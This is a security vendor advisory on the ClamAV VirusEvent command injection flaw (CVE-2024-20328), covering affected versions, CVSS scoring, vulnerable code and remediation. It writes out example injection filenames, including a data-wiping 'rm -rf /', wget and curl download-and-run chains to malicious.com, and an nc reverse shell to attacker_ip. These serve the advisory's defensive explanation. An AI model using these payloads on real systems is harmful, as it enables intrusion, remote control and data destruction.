ClamAV ClamD Service

ClamAV’s VirusEvent Command Injection Vulnerability

By

SonicWall Capture Labs Threat Research Team became aware of the ClamAV VirusEvent command injection vulnerability (CVE-2024-20328), assessed its impact, and developed mitigation measures for the vulnerability.

ClamAV is a notable, open-source anti-virus engine, widely recognized for its comprehensive suite of security solutions. It offers an array of features, including web and email scanning capabilities, endpoint security, a multi-threaded daemon, command line scanning tools, and an automatic database update service. The software boasts extensive support for various file formats, including zip, PE, rar, dmg, tar, GZIP, Bzip2, OLE2, MS Office and pdf, among others. This broad compatibility ensures that ClamAV can effectively scan and detect potential threats across a wide range of documents and files, providing robust protection against malware and viruses.

Recently, a significant security concern has emerged with the discovery of a command injection vulnerability within ClamAV. This flaw arises from the software’s mishandling of input intended for the generation of command strings. By exploiting this vulnerability, a remote attacker can orchestrate an attack by dispatching a malicious file or email to a system protected by ClamAV. If the tainted content is scanned by the compromised software, the attacker could achieve arbitrary code execution, operating under the privileges of the user running the “clamd” service. This exposes the affected systems to potential unauthorized access and control, underlining the critical need for immediate remediation and updates to safeguard against such vulnerabilities.

Product Versions Impacted

  • ClamAV 0.104 (all minor updates)
  • ClamAV 0.105 (all minor updates)
  • ClamAV 1.0.0 through 1.0.4 (LTS)
  • ClamAV 1.1 (all minor updates)
  • ClamAV 1.2.0
  • ClamAV 1.2.1

CVE Details

This security issue has been formally acknowledged and indexed in the Common Vulnerabilities and Exposures (CVE) system as CVE-2024-20328.

Due to its association with significant vulnerabilities in ClamAV, CVE-2024-20328 was given an overall CVSS score of 7.2 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L/E:U/RL:O/RC:C), indicating a high level of severity. This score is derived from a base score of 8.3, reflecting the vulnerability’s critical aspects and its implications for security. The detailed metrics reveal that the attack vector is via network, allowing potential exploitation from remote locations. The low attack complexity indicates that attackers can exploit the vulnerability with minimal effort, without requiring any privileges or user interaction, thereby widening the scope of potential attackers. The change in scope signifies that the impact of the vulnerability extends beyond the initially compromised component. Its impacts on data confidentiality, integrity and availability are all assessed as low, suggesting that while exploitation could compromise data or service, it does not lead to total loss or exposure of data.

The temporal score of 7.2 factors in the current status of the vulnerability’s exploit code maturity as unproven, indicating that there might not yet be any known exploits in the wild or that exploitation is not straightforward. The official fix at the remediation level points to the availability of patches or updates to mitigate the vulnerability, while the confirmed report confidence confirms the reliability of the reported vulnerability details.

Technical Overview

On January 2, 2024, a significant vulnerability was discovered within ClamAV, the widely utilized open-source antivirus engine. This vulnerability, arising from a command injection flaw in the VirusEvent feature of ClamAV, allows for the execution of arbitrary code on systems employing ClamAV for scanning purposes, particularly in environments like mail servers. The issue originates from the handling of crafted filenames, which, when scanned and identified as malicious by ClamAV, can trigger the execution of unauthorized commands on the system running the ClamAV daemon (clamd), all without necessitating any user interaction. This vulnerability thus presents a severe security risk, as it enables remote attackers to compromise the affected systems discreetly.

The core of the vulnerability lies in the VirusEvent feature’s functionality (See Figure 1), which is designed to execute a specified command upon the detection of a virus, using a format that incorporates placeholders for the virus name (“%v”) and the filename (“%f”). However, the critical oversight is the lack of sanitization for the filename input, permitting attackers to embed malicious commands within the filenames. These commands are then executed with the privileges of the user running clamd, as demonstrated in the clamd_others.c file’s virusaction function. This function, intended to facilitate the VirusEvent operation, constructs an environment where the PATH is set, along with variables for the filename and virus name, before dynamically building and executing a command string that includes the unsanitized filename, leading directly to the vulnerability.

Figure 1 – VirusEvent logic

Exploitation of this vulnerability can be illustrated through a configured VirusEvent in clamd.conf (See Figure 2), such as “echo VIRUS DETECTED: %v in the path %f >> /dev/stdout”. A specially crafted filename, like “# xmrig;whoami;”, can manipulate this feature to execute unintended commands, as seen in the execution output, where the command injection leads to the display of the virus detection message alongside the execution of the “whoami” command, revealing the system’s user context. This exploit underscores the imperative need for stringent input validation and the immediate application of security patches to address such vulnerabilities, safeguarding systems against potential remote attacks leveraging the ClamAV VirusEvent feature.

Figure 2 – clamd.conf entry

Triggering the Vulnerability

The ClamAV command injection vulnerability, identified in its VirusEvent feature, can be triggered under various scenarios, exploiting the lack of sanitization in the way command strings are constructed and executed. Here are four specific conditions or methods an attacker might use to exploit this vulnerability:

Embedded Commands in File Names:
Attackers might embed shell commands in file names (e.g., evilfile;rm -rf /;), which ClamAV could execute due to insufficient input sanitization in the VirusEvent feature.

Manipulating Environment Variables:
Crafted file names could manipulate environment variables to execute arbitrary commands (e.g., $(wget http://malicious.com/script.sh)), exploiting the direct passage of unsanitized command strings to a shell.

File Path Manipulation:
Attackers could include command injection payloads in file paths (e.g., /uploads/innocuous.pdf;nc -e /bin/bash attacker_ip 4444), effective in environments where ClamAV scans attacker-accessible directories.

Bypassing Command Execution Restrictions:
In restricted environments, attackers could bypass controls by crafting file names that initiate benign commands followed by malicious payloads (e.g., legitfile;curl http://malicious.com/malware -o /tmp/malware; chmod +x /tmp/malware; /tmp/malware), utilizing the VirusEvent feature for execution.

The methods above demonstrate the critical importance of validating and sanitizing all inputs in security mechanisms like ClamAV’s VirusEvent to prevent unauthorized command execution.

Exploitation

The exploitation of ClamAV’s vulnerability primarily centers on manipulating the virusaction function, especially the sequence following the vfork() system call. This function is tasked with responding to virus detection events and dynamically constructs a command string using input parameters, such as filenames and virus names, without adequately sanitizing them. The segment of code where exploitation is most critical involves the use of vfork() to spawn a new process. In the child process, identified when pid == 0, it proceeds to execute a shell command built from potentially unsafe user input via execle().

The vfork() call is crucial because it creates a new process by duplicating the address space of the calling process, allowing the child process to run in the same memory space as the parent until execle() is called. This approach is chosen for its efficiency, as it avoids the overhead of copying the entire address space of the parent process. However, the subsequent execution of a command with user-controlled input in a shell environment (/bin/sh) through execle() presents the vulnerability. The command buffer_cmd is executed in the shell without any sanitization, enabling arbitrary command execution if an attacker crafts malicious input that breaks out of the intended context.

Thus, this exploitation pathway permits attackers to run arbitrary code on systems operating ClamAV by inserting commands into filenames or other inputs processed by ClamAV, which are then included in buffer_cmd. Given that the command runs with the privileges of the ClamAV service, this vulnerability could lead to significant security incidents, including unauthorized system access, data exfiltration, or further system compromises. The specific line (See Figure 3) in the virusaction function becomes a focal point for security concerns, highlighting the critical need for strict input validation and sanitization in applications that execute commands based on external inputs.

Figure 3 – vfork() call and surrounding logic

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

  • IPS: 4281 ClamAV VirusEvent Command Injection

Visualizing Security: The Threat Graph

Remediation Recommendations

The risks posed by this vulnerability can be mitigated or eliminated by:

  • Applying the vendor-supplied patch to eliminate this vulnerability
  • Utilizing up-to-date IPS signatures to filter network traffic
  • Configuring the vulnerable product to allow access to trusted clients only
  • Keeping security software and systems current for optimal defense
  • Conducting regular security audits to identify and remediate potential weaknesses

Relevant Links

Vendor Advisory
NIST NVD CVE
CWE-78
NIST CVSS Calculator Score

Security News
The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth research, which drives protection for all SonicWall customers. In addition to safeguarding networks globally, the research team supports the larger threat intelligence community by releasing weekly deep technical analyses of the most critical threats to small businesses, providing critical knowledge that defenders need to protect their networks.